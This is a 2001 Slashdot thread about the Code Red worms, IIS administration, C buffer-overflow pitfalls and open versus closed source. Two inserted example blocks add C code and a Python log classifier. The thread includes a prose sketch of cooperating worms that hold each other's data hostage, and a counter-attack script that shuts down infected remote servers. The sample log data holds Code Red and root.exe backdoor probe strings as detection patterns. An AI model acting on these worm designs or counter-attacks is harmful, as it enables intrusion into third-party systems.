    The main reason you'd use strncat rather than strcat is to avoid buffer overflows, yet instead of the obvious choice of feeding it the buffer size, you have to feed it the maximum number of characters to add. So to use it to prevent buffer overflows, you not only need to remember the buffer size, you have to track the current string length!

    Avoid strncat! Even if you understand it, someone who changes your code might not.

    Make something more intuitive:

    /* Append src to dest, where buflen is the TOTAL size of dest. */
    char *buf_strcat(char *dest, const char *src, size_t buflen){
    char *cur=dest;
    size_t i=0;                 /* size_t: never compare a signed int to buflen-1 */
    if(buflen==0) return dest;  /* buflen-1 would wrap to SIZE_MAX and unbound the loops */
    /* skip to the end of the existing string, but never past buflen-1 */
    while(*cur && i<buflen-1){cur++; i++;}
    /* copy while there is room, leaving one byte for the terminator */
    while(*src && i<buflen-1){*cur++ = *src++; i++;}
    *cur='\0';
    return dest;
    }

    --

    ---
    You'd be surprised at the broadband connection available to things crawling around in your hair.
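    The two posts above (nevets on sprintf/snprintf, Giant Hairy Spider on strncat) each describe one pitfall of the C string routines. The following is an added example, not code from either poster, that puts the three points side by side in working C: a total-buffer-size append in the spirit of buf_strcat that also handles an unterminated destination, the correct computation of strncat's third argument, and checking snprintf's return value for truncation. All function names (safe_append, append_with_strncat, format_path, bounded_len) are hypothetical helpers written for this illustration.

```c
#include <stdio.h>
#include <string.h>

/* Added example for the thread above; helper names are hypothetical. */

/* Length of s, but never reading past buflen bytes (a nul may be missing). */
static size_t bounded_len(const char *s, size_t buflen)
{
    size_t i = 0;
    while (i < buflen && s[i] != '\0')
        i++;
    return i;
}

/* Append src to dest where buflen is the TOTAL size of dest, the interface
 * the post argues for. Truncates instead of overflowing, always leaves dest
 * nul-terminated, and returns the resulting string length. */
size_t safe_append(char *dest, size_t buflen, const char *src)
{
    if (buflen == 0)
        return 0;                         /* nothing can be written safely */
    size_t used = bounded_len(dest, buflen);
    if (used == buflen) {                 /* dest was not terminated: repair it */
        dest[buflen - 1] = '\0';
        return buflen - 1;
    }
    size_t room = buflen - 1 - used;      /* keep one byte for the terminator */
    size_t n = strlen(src);
    if (n > room)
        n = room;
    memcpy(dest + used, src, n);
    dest[used + n] = '\0';
    return used + n;
}

/* The correct way to call strncat: its third argument is the number of
 * characters still allowed to be APPENDED, so the caller must subtract the
 * current length. Passing sizeof(dest) here is the classic overflow. */
char *append_with_strncat(char *dest, size_t buflen, const char *src)
{
    size_t used = strlen(dest);
    if (used + 1 >= buflen)
        return dest;                      /* no room left to append anything */
    strncat(dest, src, buflen - 1 - used);
    return dest;
}

/* snprintf never overflows, but it silently truncates; its return value is
 * the length the full output WOULD have had, so >= outlen means truncation.
 * Returns 0 on success, 1 when truncated, -1 on an encoding error. */
int format_path(char *out, size_t outlen, const char *dir, const char *file)
{
    int n = snprintf(out, outlen, "%s/%s", dir, file);
    if (n < 0)
        return -1;
    return (size_t)n >= outlen ? 1 : 0;
}

int main(void)
{
    char buf[8] = "abc";
    safe_append(buf, sizeof buf, "defghij");   /* fills to "abcdefg", no overflow */
    printf("%s\n", buf);

    char path[8];
    if (format_path(path, sizeof path, "tmp", "a.txt") == 1)
        printf("truncated: %s\n", path);       /* "tmp/a.txt" does not fit in 8 bytes */
    return 0;
}
```

    Note that both safe_append and format_path report truncation back to the caller; silently dropping the tail of a path or a query string is how a "safe" routine still ends up opening the wrong file.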
    1. Re:More specifically... by Anonymous Coward · · Score: 0

      You're right; the C RTL string functions were clearly designed by some grad student who would have been better off in a nice marketing or sociology program somewhere. :(

      How about strcat(s1,s2) returning... not the pointer to the end of the resulting string, but a copy of the freaking s1 pointer? How useless is that?

      C's a great language, but it could have been so much more with a decent standard library. (Same with C++, for that matter.)

  81. Beware of Interlock by eddy · · Score: 3, Insightful

    I've had similar thoughts. I've been reading Multiagent Systems: A Modern Approach to Distributed Artificial Intelligence and with the Code Red outbreak, I've taken to reading it with malware in mind.

    What I've come to realize is that a worm could become real scary if its author, like me, were to be a fan of multi-agent systems. There's a plethora of research on agent-to-agent communication, just waiting for that big experiment to take place.

    Ponder this: interlock. The worms work together to reach a situation in which a host cannot be cleaned without data from another host, and vice-versa, thus making disinfection extremely hard.

    I've been sketching a scenario where relationships are created via the infection plus one level. If A infects B (first level of interconnect), then B would tell A about every other host it infects in turn (second level). These hosts would form a cluster, where each member is free to initiate contact with another and request services. One of these could be the encryption or decryption of data. Hosts would say "Please encrypt this data (hands it over) and return the encrypted result". Say host A tells host B this. Suddenly we're in a situation where we cannot simply disinfect host B, because if we do we'll lose the key that decrypts data on host A! Of course, the worms would negotiate the complement, and host A would contain the key to unlock data in host B. We then expand this scenario to a great interconnection between members of the cluster. We can strengthen the connections by allowing unrelated hosts to negotiate interlocks.

    In the same vein worms can negotiate and divide the search-space between them. Each worm could contain a compressed/simplified representation of the IP-search-space (just a couple of masks maybe? Haven't thought too hard about it). Relatives would communicate which parts have been scanned so as to not duplicate (too much) work. This then becomes a parallel binary search!

    I think I'm gonna have to write a short doomsday article too, there are just so many cool things that someone wicked could do.

    --
    Belief is the currency of delusion.
    1. Re:Beware of Interlock by greenrd · · Score: 1, Insightful
      This is no worse than a worm that erases the hard disk. Either way, you rely on backups (which people should be making anyway, to avoid data loss thru software or hardware or human error).

      A bigger danger, IMO, comes from stealth data corruption over a long period of time.

  82. Re:How do you run these scripts by Anthony+Kilna · · Score: 1

    These are meant to be CGI scripts... you need to set up your web server so that any request to http://www.yourserver.com/default.ida runs this code... You can do that by mapping .ida as a CGI extension in your server and naming the file default.ida, or by aliasing /default.ida as /redcode.pl in your server's config. What will then happen is any request for default.ida (which is what the code red virus does) will result in the requestor's machine being hit with a similar request to turn it off/shut down iis. For this code here, you'll also get an entry in your server's error log so you can know what happened.

    --
    s/[BW]ill(y|iam)?( H\.?)?( G(ate|8)(s|z))?(,? ?v?(III|3)(\.\D)?)?/Girly-man/gi
  83. Re:Liability for software defects by OmegaDan · · Score: 2
    I wonder how it is that software manufacturers have been able to escape most liability ...

    We need laws to make software companies liable for one reason -- US software already has a reputation for being of poor quality [read microsoft]. In 5 years that could become a SERIOUS economic issue for the US; maybe german software will become the avant-garde (like german engineering is thought of now), or japanese software will be the highest quality (like japanese steel is now). And suddenly we'll find ourselves out of the software market like we're out of the car market and out of the electronics market.

  84. Re:Can we please stop picking on the MCSEs? by Anonymous Coward · · Score: 0

    No we can't.

    I have yet to meet an MCSE that is worth anything.

    Actually I take that back, I did meet a real guru.. But it took some prying to get him to admit that he was MCSE certified... He was embarrassed that he had the certification, citing "I hate to have a badge that screams I'm a Moron that can buy a certification instead of earning it."

    And you know, this Microsoft preacher will agree that Microsoft is completely retarded in their cert program, teaching you their terminology instead of real skills....

    Boot from system run from boot... Only a moron would go any farther learning a doublespeak system designed only to generate money and confuse the people learning it.

  85. Totally Shameful by dpm67 · · Score: 1, Insightful

    To have that link on Slashdot that will cause the user's machine to be shut down because of the hole in IIS is ridiculous. If you wanted to help inform the lazy people and admins out there that still have that hole open on their system, it would have been MUCH more responsible to have a message stating "Click here to test your machine for this backdoor". I really have lost a lot of respect for the people at Slashdot. This is completely irresponsible and foolish.

    The fact of the matter is ALL systems have security weaknesses and limitations. This is true for both Linux and Windows, or any piece of software that has ever been written. All it takes is to subscribe to any of the excellent security mailing lists that are on the net to realize this. As a matter of fact, the last copy of the excellent SANS Security Alert Consensus (www.sans.org) lists more new vulnerabilities in Linux than Windows. Of course, the opposite is true often enough. But really, what is the point of those kinds of comparisons other than juvenile brouhaha.

    1. Re:Totally Shameful by Anonymous Coward · · Score: 0

      That link only shuts down your system IF you have shamefully operated an IIS system infected with code red.

      If you are not infected then you will see the page. The author is doing us all a favor by shutting down ONLY infected servers.

      Don't you even care to know that there is a problem?

    2. Re:Totally Shameful by uchian · · Score: 1
      Ok, I'm assuming this is a troll, but just in case...

      Code Red has been around now (and has had at least 3 stories about it on Slashdot previous to this one, yes?) for a _long_ time. In other words, anyone who reads slashdot by now knows about it, and if they haven't fixed it, deserve a quick reboot to get their attention to fix it.

      Secondly, if people aren't going to sit up and take notice of Code Red II now, we've gotta make 'em. I wouldn't be surprised if someone right now isn't working on a malicious version of Code Red that, say, reformats the hard drive after a week, or something. If/when this happens, all those lazy/ignorant people will start making a fuss at how nobody told them anything about it.

      Also note that just clicking on the link doesn't send the request - only if you happened to ask for the page default.ida?.... in other words, tried to query it as if it was a proper site. The only people who would do that are crackers, or Code Red attacks at this moment in time. Also, the shutdown request would not work unless you are infected with code red.

      I agree with your second paragraph, ish. Thing is, most Linux users know what they are doing, or never manage to install it in the first place :-P PS: I use Linux

  86. It's Microsoft by Tony-A · · Score: 0, Redundant

    Well you know, different results from identical inputs. I would guess that most installations of IIS, intentional or otherwise, have nothing to do with Add/Remove Programs.

  87. That script does NOT work! by Anonymous Coward · · Score: 0

    That script that's linked on the front page does not work, as IIS does not run with administrator permissions.

    Stopping or resetting IIS wouldn't stop an infected machine from probing and infecting others, anyway.

    The best way to stop an infected computer from being a menace is, once you have been probed, cause that box to hotsync its Palm V.

  88. Aftermath? by dohcvtec · · Score: 2, Informative

    The headline implies that the whole Code Red experience is over. I know everybody wants it to be over, but it doesn't seem to be over from where I'm sitting, looking at the sheer volume of logged packets hitting my firewall. So Microsoft has released a solution to the Code Red II worm. That's great, but now try to get most of the infected users to use it. I haven't seen any slowdown in probes from infected machines yet, so I'll believe it when I see it.

    --
    -- Never hit a man with glasses. Hit him with a baseball bat.
    1. Re:Aftermath? by easter1916 · · Score: 0

      2,500+ in the last 18 hours on my box.

  89. Re:Stop blaming microsoft by SpaceLifeForm · · Score: 1
    If I lived somewhere where it rained bullets I'd make sure I installed bullet proof glass.
    If the manufacturer told me it was bullet proof I'd probably believe him.
    If it subsequently broke when a bullet hit it, whose fault is it?
    yours probably :)

    However, I can sue for damages.
    In the case of CR and M$, there is no one to sue for damages, is there?

    --
    You are being MICROattacked, from various angles, in a SOFT manner.
  90. Re:No. by spectecjr · · Score: 1, Flamebait

    Umm... WRONG!

    You won't be able to "put a stop to this thing really fast" no matter what you do. M$/IIS is bloatware chock full of undiscovered exploits. This is not the last of THIS TYPE of worm.

    AND! Yes, it does say something about the character of the IIS admins, because it takes very little technical know-how to get an IIS server running. ("I had IIS running? I had no idea") Like I said! Uninformed, ignorant, or lazy! PICK ONE!

    I for one am glad. This is just the type of thing that can actually cause enough damage to the already tarnished track record of M$ commercial server market, to help see a real decline in their numbers.

    IIS is a disease. Apache is the cure.


    Dumbass, IIS wasn't exploited by Code Red. Index Server was.

    If you were running APACHE and had it bound to Index Server (not that farfetched on Win2k), you'd STILL have had a rooted box.

    Simon

    --
    Coming soon - pyrogyra
  91. WTF is up with that second link? by Mr.+Sketch · · Score: 0, Troll

    I clicked on that second link and it rebooted my computer, WTF? How the hell did it do that? Why wasn't there a warning 'Following this link will reboot your computer'?!?! I lost my changes to my thesis I was working on, and I'm pissed! I just figured I'd check out slashdot real quick and my computer rebooted, that sucks! Oh well, screw that, next time I'll make sure to close all my programs before checking slashdot, thanks guys.

  92. Re:Here's how open source would be better... by reflective+recursion · · Score: 1
    Closed source can be perfectly good at closing holes, if the company is as big as Microsoft. But Open Source is much better at closing those holes before they are shipped: many eyeballs make all bugs shallow. Open Source doesn't catch every bug, of course; but enough are found that when the odd hole is announced, it is a big enough deal that the patches are more likely to be installed.
    I disagree. And I also assume you haven't heard of a little something called "sendmail." It is truly the cracker's (script kiddies') dream exploit. It could be called the "cracker's favorite root tool--already installed."

    Open source producing more secure software than the proprietary world is a _myth_. Where is the concrete evidence to back up this claim? And because it is open do not think that more eyes see it (and much less _analyze_ it). Then there are the eyes out there looking for an exploit.

    Exploits for open source are a "big enough deal" only because most users of open source are technically adept. The people with infected IIS are not admins and most are probably not very technical (end-users).

    Keep in mind people are _paid_ to fix proprietary (commercial) software. This is not always true for open source (and much less true for those numerous "applications" on sourceforge.net and freshmeat.net).

    Closed Source hurts Microsoft security in more ways than one. Not only are all default installations compromised, but since so many new patches come out every week most admins don't keep up with them. While this is partially the admin's fault, it is also the fault of the software model that prevents these problems from being found quickly.

    Default installations compromised? Are we talking about Red Hat or Microsoft here? Can't be our beloved Red Hat. I don't see what makes people believe that all these Linux newbies keep up with patching their system. A good number of Linux users do not even know how to upgrade (much less use diff/patch) their kernel. Many do not even know man(ual) pages. Proprietary software does not help crackers either. It is equally hard to exploit closed source software as it is to find exploits in closed source software. Make sense? If you claim it is hard to find problems in closed source, what makes you think crackers had an easy time too? They don't, trust me.

    It goes a little something like this: Cracker Joe finds an exploit doing heavy reverse engineering (sometimes--not always of course). He shows the world his exploit to become famous (most crackers attach some sort of handle to show their "inside" friends on IRC and what not--bragging rights). This exploit travels by ignorance. Not because it cannot technically be stopped. _Any_ exploit is technically stoppable.
    --
    Dijkstra Considered Dead
  93. Microsoft's own practices by rcw-home · · Score: 1
    Microsoft actually gives each employee administrator access to their own workstation. There usually isn't any attempt to lock the local workstations down. They even use FAT32 on the Windows 2000 master images.

    I believe this is the primary reason why so many random things want administrator access on Windows NT/2000 and why the default file permissions/registry keys are so loose.

  94. Warhol Worm proposed: 15 minutes to total infectio by molo · · Score: 5, Interesting
    • 2001-08-11 13:18:46 Warhol Worm proposed: 15 minutes to total infection! (articles,bug) (rejected)
    Since /. rejected this story, I posted it to the K5 Queue (only visible if you have a K5 account).

    Here's the scoop (more meat at K5):

    According to an article in the latest issue of the RISKS digest, Nicholas Weaver of UC Berkeley has written a description of a new type of worm, the Warhol Worm. He believes that using a divide-and-conquer method, all vulnerable machines over the entire IPv4 address space could be compromised in only 15 minutes!

    `In the future, everybody will have 15 minutes of fame' -Andy Warhol

    --
    Using your sig line to advertise for friends is lame.
  95. Some don't know they have IIS by cvd6262 · · Score: 5, Insightful
    "...it also gives you an option to permanantly disable IIS."

    This is a bigger fix than one might think. At the university at which I work, the major problem was not the sys admins who did not patch their servers, it was the professors who had Win2K Professional on their workstations with IIS on and didn't even know it. Some of them knew about the worm, even made sure that the department's IT teams patched their servers, but did not know that they were running a web server in their office, let alone that they were infected.

    --

    I'd rather have someone respond than be modded up.

    1. Re:Some don't know they have IIS by Gerdts · · Score: 1

      Often times machines at universities are not administered by competent IT staff. It is quite common for a professor to have a grad student manage his/her machines. Normally that grad student doesn't really give a damn about anything other than going to school. Most grad student/admins that I ran across did so because their major professor told them to, not because they wanted. They all eagerly waited for a new grad student to come in to take over IT for the research group.

      Now couple that with universities' famous reputation for fighting firewalls tooth and nail. What a wonderful combination.

    2. Re:Some don't know they have IIS by Anonymous Coward · · Score: 0

      A Frontpage install did it for me.

    3. Re:Some don't know they have IIS by lowflying · · Score: 1
      I'd really like to know how this happens.

      Having spent the last week cleaning up in a similar university environment, one of the ways it happened was installing other MS software that automatically installed IIS without any indication to the end user. Project Central Server was the primary culprit. They only needed Project or just the client, but they had all heard that with Central Server they could share info on their projects, and there it was on their install CDs...

      The other apparent source of the problem was several people not knowing what IIS was, but seeing the option to install it when they put their Win2K Pro CD for other reasons. There would be a warning if it was risky, right?

      Dave

    4. Re:Some don't know they have IIS by Anonymous Coward · · Score: 0

      I'd rather have someone respond than get moderated up.

      your wish is my command....

    5. Re:Some don't know they have IIS by mj01nir · · Score: 1

      So how the heck do the Win2K Pro boxen that people run somehow spontaneously install IIS on them without their knowledge?

      Because lots of users don't use the default install. A custom install is always more interesting because you can see what options are available.

      Also, many folks don't know what the hell Internet Information Server is. Sounds like one of those spiffy add-ons for Internet Explorer. So they install it (either at install-time or from fooling around in Add/Remove) and forget it.

      --
      the no .sig .sig
    6. Re:Some don't know they have IIS by Tarpan · · Score: 1

      Either they clicked all the boxes just for the fun of it, or the university had some sort of custom install thingie for all its users and it was included in there.

  96. Nice Grammar, RR! by Pope · · Score: 1
    OR IF YOUR ARE A MACINTOSH USER

    Remind me never to sign up with these folks. This should have gone out last freakin month.

    --
    It doesn't mean much now, it's built for the future.
    1. Re:Nice Grammar, RR! by bonzoesc · · Score: 2

      That's actually when I got this message - but I felt a need to post it today just to demonstrate what retarded "admins" have to ignore in order to distribute Code Red.

  97. Why is the admins fault? by mandria · · Score: 1

    I've been reading through posts and it bothered me when people say it's the admins' fault for not patching.
    Excuse me here for a sec, but if you buy a car, do you buy it broken? Did you see any car company offer "patches" for a car?
    Even in rare cases of a defective engine, the owner takes the car in and has it replaced if he bought it brand new. Car companies don't have customers opening the hood and applying patches.

    1. Re:Why is the admins fault? by SuiteSisterMary · · Score: 2

      The patch was available a full month before Code Red 1 popped up. Off hand, I'd say that it's not Microsoft's fault. Or look at it this way. Red Hat 6.x is filled with known holes. If I install it on the public internet, is it Red Hat's fault, or my fault, for using it?

      --
      Vintage computer games and RPG books available. Email me if you're interested.
    2. Re:Why is the admins fault? by Anonymous Coward · · Score: 0

      Cars aren't on a big network where exploits can be done remotely. If the server won't run reliably on a local network, then that's a problem, and I wouldn't buy the software. However, security holes are inevitable when all computers are connected.

      Have you ever seen a cracker making all Fords in the world break down from a computer in China?

      In general, parallels between cars and computers don't work.

    3. Re:Why is the admins fault? by uchian · · Score: 1

      But if you bought a make of car which the company later recalled to have new headlights fitted because a particular batch were faulty, it's your fault if you don't take your car in to be fixed, isn't it?

  98. Re:Warhol Worm proposed: 15 minutes to total infec by SpaceLifeForm · · Score: 1
    Prediction: before the year is out, you will see a "worm kernel" that incorporates thought-out techniques like this, with a modular interface for plugging in the latest exploits.

    Wishful thinking? It's probably out already.

    --
    You are being MICROattacked, from various angles, in a SOFT manner.
  99. Re:Blame everyone bigger than you.! by Anonymous Coward · · Score: 0

    Ya I can't wait to see all the excuses people make when the next BIND or Sendmail sploit comes out.

    Microsoft doesn't have a monopoly on crappy security.

    How many times have I seen people scanning my whole subnet from a cracked redhat box?

    way too many.

  100. Re:You got it wrong. MCSE's are trained to... by estes_grover · · Score: 1

    if Reboot, Re-install, Add RAM fails....add CPU ;-)

  101. Well... by cyberwench · · Score: 1

    ... I have to admit that I would never have tried it (being more of a just-above-freezing-temperature Coke person myself) without the virus hype going on. Honestly, I wouldn't have known it existed if I wasn't keeping up with Slashdot.

    Having tried it though, it's not bad. Sort of a carbonated fruit punch flavor.

    --
    ~ Leilah
  102. At Last, the Professor Teaches the Easy Way by lildogie · · Score: 2

    Isn't it funny that they released a bonehead tool just after they found out that their own admins are boneheads?

  103. Re:FUD ALERT by crywolf · · Score: 2

    Let's see. I install Win2K Pro. I start setting it up with some degree of security, install a few apps. It occurs to me to check for updates (it had to do with getting strong encryption in Win2K), so I download SP2. I install it, or try to. Partway through, it decides it can't find its files, no matter how many times I point to it. So I cancel, and then it can't find the files it needs to undo what it did. Again, telling it where the files are does no good.

    Start over with installing Win2K Pro, but the SP is either the very next step or will not happen.

    In retrospect, it could have been that I removed permissions from Outlook Express (obviously an essential part of the operating system).

    I can certainly understand how anyone would be paranoid about installing something in Windows.

    --
    CAUTION: Product may be hot after heating
  104. Re:Stop blaming microsoft by DrSkwid · · Score: 1

    If I lived somewhere where it rained bullets I'd make sure I installed bullet proof glass.

    If the manufacturer told me it was bullet proof I'd probably believe him.

    If it subsequently broke when a bullet hit it, whose fault is it?

    yours probably :)

    --
    There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
  105. Re:Wow, it really is [NOT] stopping by Anonymous Coward · · Score: 0

    Here in San Diego, on Road Ruiner, [typo intended] CR II scans have gone from about one every five minutes to one every 15 minutes (with a lot fewer duplicates.)

    But I attribute that effect to the default.ida script. :-)

    Curiously, I've started getting CR ONE hits again tonight. NNNNNNNNNNNNNNNNNNNNNNN
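
    An added example, not from this thread or any poster: a Python classifier for Apache access-log lines that separates Code Red I scans (default.ida padded with N) from Code Red II scans (padded with X) and root.exe backdoor probes, and reports the hit count, distinct sources and mean minutes between hits per family, the kind of rate the post above eyeballs. The log lines are constructed samples on documentation address ranges; the X padding for Code Red II comes from the worm's published write-ups rather than from this page.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample Apache combined-format access_log lines. Addresses are
# documentation ranges and the overflow request strings are shortened; these
# are not captured traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [06/Aug/2001:22:01:13 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 287 "-" "-"
192.0.2.11 - - [06/Aug/2001:22:06:40 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 287 "-" "-"
198.51.100.7 - - [06/Aug/2001:22:07:02 -0700] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
192.0.2.11 - - [06/Aug/2001:22:21:40 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 287 "-" "-"
192.0.2.12 - - [06/Aug/2001:22:36:40 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 287 "-" "-"
203.0.113.5 - - [06/Aug/2001:22:40:02 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
192.0.2.13 - - [06/Aug/2001:23:01:13 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 287 "-" "-"
"""

# Source address, bracketed timestamp, request line and status of one log entry.
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def classify_request(path):
    """Map a request path to a worm family, or None for ordinary traffic.

    Code Red (July 2001) pads its default.ida overflow request with 'N';
    Code Red II pads it with 'X' (an assumption taken from the published
    worm analyses, not from the thread). A request for /scripts/root.exe is
    a probe for the backdoor Code Red II leaves on infected hosts.
    """
    m = re.match(r"/default\.ida\?(N{8,}|X{8,})", path)
    if m:
        return "code_red_1" if m.group(1)[0] == "N" else "code_red_2"
    if path.lower().startswith("/scripts/root.exe"):
        return "backdoor_probe"
    return None


def parse_log(text):
    """Return (timestamp, source, family) for every worm-related line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed or truncated line: skip rather than guess
        family = classify_request(m.group("path"))
        if family is None:
            continue
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        events.append((ts, m.group("src"), family))
    return events


def summarize(text):
    """Per family: hit count, distinct sources, mean minutes between hits."""
    by_family = defaultdict(list)
    for ts, src, family in parse_log(text):
        by_family[family].append((ts, src))
    report = {}
    for family, hits in by_family.items():
        hits.sort()
        gaps = [(b[0] - a[0]).total_seconds() / 60 for a, b in zip(hits, hits[1:])]
        report[family] = {
            "hits": len(hits),
            "sources": sorted({src for _, src in hits}),
            "mean_minutes_between_hits": round(sum(gaps) / len(gaps), 1) if gaps else None,
        }
    return report


if __name__ == "__main__":
    for family, stats in sorted(summarize(SAMPLE_LOG).items()):
        print(family, stats)
```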

  106. Re:Since when? by Anonymous Coward · · Score: 0

    Yes, it's part of the default install from the cd. From what I remember you have to say no or do not install or else the default is 'yes' install IIS. You're talking about an already built box like Dell or Gateway. He's talking about installing from an actual Win2k cd.

  107. Re:Not the mess they made... by malfunct · · Score: 1

    And then someone will write an exploit of the "auto-update" feature to install whatever the hell they want on the machine. Yeah good idea bud :)

    --

    "You can now flame me, I am full of love,"

  108. Re:Since when? by omega9 · · Score: 1

    Lighten up. He only said "2k". Maybe he's running server.

    Having said that, he probably is running Win2k Pro and is a fucking moron.

    Omega9
    $chown us base

    --
    I'm against picketing, but I don't know how to show it.
  109. You know 'Ramen' is dutch for 'windows' :) by Otis_INF · · Score: 2

    I always found it funny the RH worm was called 'Ramen', which is the plural of 'Raam' or in English: 'Window'.

    --
    Never underestimate the relief of true separation of Religion and State.
  110. Re:Since when? by omega9 · · Score: 1

    and

    --
    I'm against picketing, but I don't know how to show it.
  111. Re:Not the mess they made... by malfunct · · Score: 1
    Most users don't want to deal with that, they sign away their safety and that's fine with them. I mean at some point not everyone in the world can be a computer expert, so are you recommending that people that aren't shouldn't have a computer? Fsking elitist. Sorry you lose.

    There wouldn't be a computer industry if it weren't for the "stupid" people needing computers to help out their jobs and lives. What we need to do is constructively help make the experience good and safe for everyone. MS is trying hard to do this, doesn't always succeed, but they try hard. Linux people just yell "rtfm".

    --

    "You can now flame me, I am full of love,"

  112. Re:Actually: authors of strncat() MAN PAGE and get by Anonymous Coward · · Score: 0

    FreeBSD even goes a step further; whenever you so much as RUN a program that links to gets(), it pops up a huge warning, basically saying "This program uses gets(), and is a root exploit waiting to happen!" Things like that really get bugfixes flowing to the authors. :-)

  113. Re:Here's how open source would be better... by cburley · · Score: 1
    But you forgot one important detail: not everyone is a programmer.

    Can you point to a single thing I said that shows that I "forgot" this one important detail??

    The fact is, I'm acutely aware, and have been since about age 12, that I'm somewhat rare in being able to read source code.

    My reason for posting what I did was not to convince you, it was to counter the propaganda you posted, so others may realize there are other views, may consider the various sources for those views, and do the research, or at least the thinking, for themselves.

    To meet that goal, I need not back up everything I say, any more than you did in your claims about the security of proprietary software as a model, or in any of its specific forms.

    I was pointing out that people with the virus are ignorant end-users.

    If they're "ignorant end-users", why is Microsoft letting them run a web server on a hostile network, allowing their systems to become launching-pads for further hostile actions against other systems?

    My point is that Microsoft exerts vastly more control over the computing environment of Microsoft users (and willfully so) than any combination of GNU/Linux/*BSD/CPAN authors do over the computing environment of their users.

    (As one example: Microsoft's encyclopedia software -- "Encarta"? -- disables printing of illustrations on the user's screen, apparently to satisfy some intellectual-privilege concern. I discovered this when trying to help a friend who wondered why he and his children could print some pictures out on their inkjet printer, but not all. If MS can be so conscientious about deciding, on behalf of the user as they'd surely claim, that he shouldn't print something since he might turn around and get his $100 inkjet printer's output reproduced in a national magazine without paying the licensing fee, they can certainly disable IIS for users who haven't proven they can "handle" deploying such a product on a hostile network like the Internet.)

    Therefore, Microsoft and other proprietary-software developers have taken upon themselves much more responsibility for their software being insecure, out of the box, than free-software developers, because they restrict the freedom of their users to actively engage in the sorts of open discussions and reviews regarding security that are day-to-day happenings in the free-software world.

    Free software is about freedom, and that and related values are what are willingly and fully extended to all end users of that software. Microsoft (and, generally, proprietary) software is about profit, but more to the point, about control, about restricting freedom of the users of that software.

    To pretend that the security implications of those two very different world-views are negligible or non-existent is to delude oneself.

    (Note that I have made no claims about either approach being inherently "good" or "evil". My point here is focused simply on the fact that when you put the user in a straightjacket, you, the proprietary software developer, are responsible for the care, feeding, and shelter of that user, as well as for the violence committed by that user when you allow someone else to "infect" them with some virus and fail to restrain them, especially if you allow them access to a button they can press with their nose that is labeled "Destroy Internet". Those who refuse to put users in straightjackets, yet who are willing to provide them food they can freely use as they see fit, ditto for shelter, ditto for care, ditto for recommendations as to how to avoid accepting the intellectual, or software, equivalent of viruses, have nowhere near the same level of responsibility for their behavior. They do not have zero responsibility, however! But, in allowing their end users freedom, they give them much better defensive weaponry to use against those engaging in bad behavior, which is why those of us who run GNU/Linux, for example, aren't nearly as directly affected by badly-behaving proprietary software as are users of different proprietary software -- we haven't accepted unilateral disarmament as have they.)

    I am arguing proprietary software does not equal insecure, and open source does not equal secure.

    With that I almost wholeheartedly agree. Except, as I pointed out, proprietary software never equals "objectively provable as secure", since the general public can never be allowed to see the details of how it works and discover security flaws for itself.

    If the software shop refuses to fix a security problem...

    You went off the point there. It was you who made the claim that free-software fixes aren't always funded, whereas proprietary-software fixes are. (That is a reasonable inference from the symmetry of your earlier quote.)

    So, I was not arguing against the free market, or capitalism, or libertarianism, or whatever other red herrings you wish to throw into this argument.

    I was simply pointing out that being dependent on free software means depending on someone, somewhere in the world, being willing and able to fix problems for you when they come up (whether they are already an employee of yours), whereas being dependent on proprietary software means depending on such a person being found (and funded) in, what, about .00001% of the world's population. (This is my attempt at a quick calculation based on an assumption of 6000 people in a typical proprietary-software company vs. 6 billion people worldwide. Of course, the entire world's population isn't capable of fixing software bugs, but the percentage that is probably isn't vastly lower than the percentage of employees of a typical software company, in my experience.)

    Further, unlike the corporate environment of a proprietary-software developer, in the "real world" there is no manager threatening someone for termination if they go ahead and fix a problem based on a customer complaint. (Believe me, I know both sides of this issue very well; I've been "reprimanded", or at least hassled in performance reviews, for taking time to provide very-well-received fixes for customers, as well as for in-house users. The free-software world does not revolve around such archaic constraints on human activity. Yes, I ultimately responded to such exercises of managerial oversight by leaving the organization -- at which point, I became incapable of rendering similar fixes for those same customers in the future! I have no such limitations placed on me when I decide to leave a free-software project like, say, g77.)

    Upon which pool of available talent do you (not the poster, but the /.-reading public out there) wish to restrict yourself, in finding solutions for your computing problems, such as inadequate security -- the entire world's population, or the approximately .00001% of that population whose only real "claim to fame" is that, if they help you, they probably aren't breaking the law as well as pulling rabbits out of their hats by hacking binary code with no source available?

    Buy a new computer, perhaps? One that can run the newer software.

    In other words, when the software you paid for the privilege of using, but not studying or improving, fails, you have to not only buy some next-generation form of that software, but newer computers to run it?

    The answer is: of course that's true, for proprietary software. That's why, of the reasonably high number of 486 CPUs out there running in production mode as mail and web servers, a vanishing percentage, I suspect, run proprietary software for those apps -- instead, they probably run a Linux or *BSD kernel, Apache, qmail, etc.

    That's also why my wife's organization's IT facility decided to finally convert over from Macintoshes to IBM PC machines to address the Y2K problem. Because Macs were not Y2K compliant? No, because Microsoft Excel, the version they were running on their Macs, wasn't, and to get a version that was that would run on Macs, they would have to upgrade the Macs themselves anyway, so they "might as well" switch to the more "dominant" architecture.

    That is, they punished the company that produced a largely-Y2K-compliant system and rewarded the one that boxed them into a corner by creating Y2K-buggy software for years. That's exactly the kind of perverse result one would expect from depending on obscurity rather than openness.

    Of course, if they'd had the source and the freedom to hire whoever they wished to fix it, they could have had the choice to fix just the Y2K problem in Excel and continue running it on their old, but perfectly-working, Macs.

    Again, you are bashing Microsoft with "M$."

    It's a common abbreviation I usually succeed at avoiding, but used, what, once in that entire post?

